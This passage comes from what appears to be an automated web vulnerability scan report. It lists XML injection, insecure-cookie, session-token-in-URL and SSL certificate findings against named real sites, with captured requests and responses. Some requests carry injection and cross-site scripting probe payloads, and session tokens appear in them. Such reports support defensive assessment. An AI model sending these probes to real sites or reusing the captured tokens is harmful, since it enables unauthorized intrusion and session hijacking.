HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:12:28 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:12:28 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:27:28 GMT;path=/
Content-Length: 20281

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.91. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/options_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:23 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:23 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:23 GMT;path=/
Content-Length: 20517

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.92. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom-righthealth-sem-chimborazo-153574.js?1305315777 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:24 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:24 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:23:24 GMT;path=/
Content-Length: 20725

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.93. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js?1305315846 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:00 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:00 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:00 GMT;path=/
Content-Length: 20538

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.94. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.righthealth.com
Path:   /javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /javascripts]]>>/cache/topic_top-s_righthealth-chimborazo-153574.js?1305315776 HTTP/1.1
Host: www.righthealth.com
Proxy-Connection: keep-alive
Referer: http://www.righthealth.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=ffeeb640-615b-012e-af22-003048fe49ee; as=ref_absent; KC=K; NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:02 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: KC=K; path=/
Set-Cookie: iq=javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:02 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b445525d5f4f58455e445a4a423992;expires=Sun, 15-May-2011 20:22:02 GMT;path=/
Content-Length: 20496

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

9. SSL cookie without secure flag set
There are 4 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


9.1. https://console.iserve.net.nz/webmail/src/login.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://console.iserve.net.nz
Path:   /webmail/src/login.php

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webmail/src/login.php HTTP/1.1
Host: console.iserve.net.nz
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HMC=o26lr6438snpg5gnvbt345p6p4

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:26:28 GMT
Server: Apache
Set-Cookie: SQMSESSID=lhinv4vn27moe5rrjla8h7a6a7
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: SQMSESSID=lhinv4vn27moe5rrjla8h7a6a7; secure; HttpOnly
Set-Cookie: SQMSESSID=rgcameo6b3i9f7cq6ncfnjpmc2; path=/webmail/
Set-Cookie: SQMSESSID=rgcameo6b3i9f7cq6ncfnjpmc2; path=/webmail/; secure; HttpOnly
Content-Length: 2549
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>
<meta name="robots" content="noindex,nofollow">
<link rel="stylesheet" type="text/css" href="none">
<title>WebMail - Log
...[SNIP]...

9.2. https://console.iservices.net.nz/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://console.iservices.net.nz
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: console.iservices.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 15 May 2011 17:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.0
Set-Cookie: ISERVICES_SESSID=a9agNSGwK4OtskHsxPBzoteywVW5xym; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

9.3. https://mail.orcon.net.nz/portal/login.php

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.orcon.net.nz
Path:   /portal/login.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /portal/login.php HTTP/1.1
Host: mail.orcon.net.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 17:35:51 GMT
Server: Apache/1.3.34 Ben-SSL/1.55 (Debian) PHP/4.4.4-8+etch6
X-Powered-By: PHP/4.4.4-8+etch6
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: orcon_webmail=deleted; expires=Sat, 15 May 2010 17:35:50 GMT
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 323

       <body onload="document.form.submit();">
           <form name="form" action="./index.php" method="post">
               <input type="hidden" name="_error" value="Incorrect username or password">
               <input type=
...[SNIP]...

9.4. https://secure.tagged.com/secure_login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure_login.html?username=&password=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000043%29%3C%2Fscript%3E&token=88db48c3004723571667ba30eebca51e&perslogin=Y HTTP/1.1
Host: secure.tagged.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883%22%3E%3Cscript%3Ealert(%22INSECURE%22)%3C/script%3E868fc1f78e0=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:51:11 GMT
Server: Apache
Set-Cookie: S=eukphp97h1sm400vgrjmip7qj6; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 4061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dyn/css/3/_2
...[SNIP]...

10. Session token in URL
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


10.1. http://bh.contextweb.com/bh/set.aspx

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /bh/set.aspx?action=add&advid=2532&token=AMQU1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Set-Cookie: V=tRT1MopEi6hc; Domain=.contextweb.com; Expires=Wed, 09-May-2012 18:35:35 GMT; Path=/
Set-Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; Domain=.contextweb.com; Expires=Mon, 18-Apr-2016 18:35:35 GMT; Path=/
Content-Type: image/gif
Date: Sun, 15 May 2011 18:35:34 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

10.2. https://secure.tagged.com/secure_login.html

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /secure_login.html?username=&password=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000043%29%3C%2Fscript%3E&token=88db48c3004723571667ba30eebca51e&perslogin=Y HTTP/1.1
Host: secure.tagged.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883%22%3E%3Cscript%3Ealert(%22INSECURE%22)%3C/script%3E868fc1f78e0=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:51:11 GMT
Server: Apache
Set-Cookie: S=eukphp97h1sm400vgrjmip7qj6; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 4061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dyn/css/3/_2
...[SNIP]...

10.3. http://www.tagged.com/api/

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.tagged.com
Path:   /api/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

POST /api/?application_id=user&format=json&session_token=k48nnbumc29k7tunhd4mautaa0 HTTP/1.1
Host: www.tagged.com
Proxy-Connection: keep-alive
Referer: http://www.tagged.com/forgot_password.html
Origin: http://www.tagged.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=k48nnbumc29k7tunhd4mautaa0; __qca=P0-1020015937-1305484533946; __utmz=50703532.1305484534.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=50703532.202314569.1305484534.1305484534.1305484534.1; __utmb=50703532.0.10.1305484534; __utmc=50703532
Content-Length: 299


method=tagged.header.renderAlerts&callback=tagged.header.alerts.show&api_signature=&track=pkXrwJtpd9
method=tagged.util.echoIt&data=&callback=tagged.header.alerts.init&api_signature=&track=pkXrwJtpd9
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:36:10 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 219

["{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 25.67\",\"result\":{\"HTML\":\"\"}}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 25.67\",\"result\":\"\"}","{\"stat\":\"ok\",\"diagnostics\":\"0 2.3 25.67\",\"
...[SNIP]...

11. SSL certificate
There are 10 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



11.1. https://clicktale.pantherssl.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://clicktale.pantherssl.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.pantherssl.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Wed Oct 27 19:00:00 CDT 2010
Valid to:  Tue Dec 11 17:59:59 CST 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

11.2. https://d2s.iserve.net.nz:8443/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://d2s.iserve.net.nz:8443
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  d2s.iserve.net.nz
Issued by:  d2s.iserve.net.nz
Valid from:  Thu Nov 24 14:35:56 CST 2005
Valid to:  Sun Nov 22 14:35:56 CST 2015

11.3. https://console.iserve.net.nz/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://console.iserve.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  console.iserve.net.nz
Issued by:  UTN-USERFirst-Hardware
Valid from:  Wed Mar 02 18:00:00 CST 2011
Valid to:  Fri Mar 02 17:59:59 CST 2012

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

11.4. https://console.iservices.net.nz/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://console.iservices.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  console.iservices.net.nz
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Aug 01 19:00:00 CDT 2010
Valid to:  Thu Sep 22 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.5. https://idm.net.nz/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idm.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  idm.net.nz
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Mon May 09 19:00:00 CDT 2011
Valid to:  Wed May 09 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.6. https://mail.orcon.net.nz/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://mail.orcon.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  mail.orcon.net.nz
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Apr 19 18:13:09 CDT 2011
Valid to:  Wed May 09 22:11:21 CDT 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

11.7. https://orcres.cosmos.net.nz/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orcres.cosmos.net.nz
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.cosmos.net.nz
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Sun Jun 14 19:36:10 CDT 2009
Valid to:  Tue Jun 14 19:36:10 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

11.8. https://portal.bizoservices.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal.bizoservices.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.bizoservices.com
Issued by:  UTN-USERFirst-Hardware
Valid from:  Mon Aug 02 19:00:00 CDT 2010
Valid to:  Wed Aug 03 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.9. https://secure-static.tagged.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure-static.tagged.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.tagged.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Tue Jun 09 16:26:18 CDT 2009
Valid to:  Tue Jul 05 18:58:16 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

11.10. https://secure.tagged.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.tagged.com
